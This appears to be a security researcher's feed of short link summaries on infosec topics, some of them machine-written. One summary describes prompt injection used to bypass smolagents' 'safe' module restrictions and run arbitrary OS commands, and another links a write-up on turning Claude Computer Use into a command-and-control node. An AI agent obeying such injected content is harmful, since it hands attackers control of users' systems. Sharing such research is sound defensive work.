Open source bug bounty ready AI?
All opinions and posts are my own.
My employers (past or present) are not responsible and may not agree with any of them.
Posts do not imply endorsement or agreement as I may just be sharing a discussion/topic of interest.
CVE-2025-24091 - sending Darwin notifications to DoS iPhone
POC: Widget extension VeryEvilNotify š
Blog Post:
https://rambo.codes/posts/2025-04-24-how-a-single-line-of-code-could-brick-your-iphone
The writer exposed a critical vulnerability in Hugging Faceās smolagentsāa lightweight AI agent framework. By leveraging prompt injection to bypass āsafeā module restrictions, attackers can execute arbitrary OS commands, highlighting mounting security risks for autonomous AI systems. - o3-mini summary
This write-up reveals how attackers exploited Go's module proxy caching to maintain persistent malicious code distributionāeven after repository updates. This sophisticated attack remained undetected for years, highlighting a serious supply chain vulnerability.
Takeaways:
⢠Proxy caching features can be weaponized
⢠Traditional security measures may miss these attacks
⢠Urgent need for enhanced package verification
š” Action Items for Dev Teams:
https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
Microsoftās AI red team has tested over 100 generative AI products and uncovered three essential lessons. First, red teaming is the starting point for identifying both security vulnerabilities and potential harms as part of responsible AI risk management. This includes spotting bias, data leakage, or other unintended consequences early in product development Second, human expertise is indispensable for addressing complex AI threats While automated tools can detect issues, they canāt fully capture the nuanced misuse scenarios and policy gaps that experts can identify Third, a defense-in-depth strategy is crucial for safeguarding AI systems Continuous testing, multiple security layers, and adaptive defenses collectively help mitigate risks, as no single measure can eliminate vulnerabilities in ever-evolving models. By combining proactive stress testing, expert analysis, and layered protections, organizations can better navigate the opportunities and challenges presented by generative AI. - LLM Summary
A Cloud Guru terminates "lifetime" course access for reasons of "plan being retired".
Neural Fictitious Self-Play (NFSP) for Imperfect-Information Games
Reinforcement learning "improviser" and supervised learning "planner"
Blog post and explanation: https://ai.gopubby.com/neural-fictitious-self-play-nfsp-for-imperfect-information-games-0a8189770240
Research paper (not recent):
https://arxiv.org/abs/1603.01121v2
Series on "Beyond XSS" including topics such as Cross-site leaks and CSTI
https://aszx87410.github.io/beyond-xss/en/
Very appropriately, it was built using docusaurus, a static site generator :blobgrin:
The Future of Application Security: Integrating LLMs and AI Agents into Manual Workflows
https://www.anshumanbhartiya.com/posts/the-future-of-appsec
LLM Summary::
LLMs are no longer just about generating content - they're becoming powerful security allies by combining planning, memory, and sophisticated tool usage capabilities. These agents can understand complex queries and respond naturally to security challenges.
LLM integration is revolutionizing software engineering by:
⢠Enhancing defect prediction
⢠Automating security documentation
⢠Reducing human errors in code review
⢠Streamlining secure coding practices.
"Quantum decryption may materialise only two or three decades later, said Prof Ling, but enterprises will defend themselves better if they keep up to date and know their data repositories and vulnerabilities."
InfoSec Black Friday Deals 2024
https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md
Shazzer is a fuzzing tool designed to uncover browser quirks and reveal security vulnerabilities by focusing on differences in browser behavior. Whether you're testing for HTML parsing issues, JavaScript execution, or XSS vulnerabilities, Shazzer can be used.
A recent video by Portswigger shows its use : https://youtu.be/mLzxwmNoAI4?si=NnDWXZOqc-Yjnue1
Shazzer aims to achieve:
Video - Hacking Azure: From OSINT to Full Compromise!
Scenario:
A seemingly innocuous post by a new manager at Mega Big Tech, showcasing their new workstation, inadvertently leaked sensitive Azure credentials. This oversight allowed attackers to gain unauthorized access, escalating privileges through a compromised Azure Logic App Automation, leading to potential data breaches.
Learning points:
SaaS attack techniques blog post has some notable attack vectors such as:
Read more here:
Using burp suite to test Android apps running on Android 14
https://danaepp.com/hacking-modern-android-apps-with-burpsuite
"The LLM and Generative AI Security Solutions Landscape ... provides a reference guide of the solutions available to aid in securing LLM applications, equipping them with the knowledge and tools necessary to build robust, secure AI applications."
Three things to read about:
https://genai.owasp.org/resource/llm-and-generative-ai-security-solutions-landscape/
GitHub Spark - an AI tool that makes web apps with natural language prompts.
ZombAIs: From Prompt Injection to C2 with Claude Computer Use
https://embracethered.com/blog/posts/2024/claude-computer-use-c2-the-zombais-are-coming/